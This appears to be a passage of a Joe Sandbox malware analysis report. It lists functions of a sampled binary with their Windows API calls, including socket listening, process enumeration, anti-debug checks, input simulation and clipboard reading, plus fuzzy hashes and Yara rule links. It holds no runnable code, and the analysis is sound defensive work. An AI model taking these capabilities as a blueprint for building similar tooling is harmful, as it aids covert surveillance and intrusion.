                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                            Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove$_strncmp
                            • String ID: @oH$\$^$h
                            • API String ID: 2175499884-3701065813
                            • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                            • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                            • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                            • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                            Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLast$closesocket$bindlistensocket
                            • String ID:
                            • API String ID: 540024437-0
                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                            Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                            • API String ID: 0-2872873767
                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                            Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                            • __wsplitpath.LIBCMT ref: 00475644
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscat.LIBCMT ref: 00475657
                            • __wcsicoll.LIBCMT ref: 0047567B
                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 2547909840-0
                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                            Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                            • FindClose.KERNEL32(?), ref: 004525FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                            • String ID: *.*$\VH
                            • API String ID: 2786137511-2657498754
                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                            Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID: pqI
                            • API String ID: 2579439406-2459173057
                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                            Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            • __wcsicoll.LIBCMT ref: 00433349
                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                            • __wcsicoll.LIBCMT ref: 00433375
                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicollmouse_event
                            • String ID: DOWN
                            • API String ID: 1033544147-711622031
                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                            Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: KeyboardMessagePostState$InputSend
                            • String ID:
                            • API String ID: 3031425849-0
                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                            Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLastinet_addrsocket
                            • String ID:
                            • API String ID: 4170576061-0
                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                            Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                            • IsWindowVisible.USER32 ref: 0047A368
                            • IsWindowEnabled.USER32 ref: 0047A378
                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                            • IsIconic.USER32 ref: 0047A393
                            • IsZoomed.USER32 ref: 0047A3A1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                            Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                            • CoInitialize.OLE32(00000000), ref: 00478442
                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                            • CoUninitialize.OLE32 ref: 0047863C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                            • String ID: .lnk
                            • API String ID: 886957087-24824748
                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                            Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32(?), ref: 0046DCE7
                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                            • CloseClipboard.USER32 ref: 0046DD0D
                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                            • CloseClipboard.USER32 ref: 0046DD41
                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                            • CloseClipboard.USER32 ref: 0046DD99
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                            • String ID:
                            • API String ID: 15083398-0
                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                            Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: U$\
                            • API String ID: 4104443479-100911408
                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                            Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                            Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                            • FindClose.KERNEL32(00000000), ref: 004339EB
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FileFind$AttributesCloseFirst
                            • String ID:
                            • API String ID: 48322524-0
                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
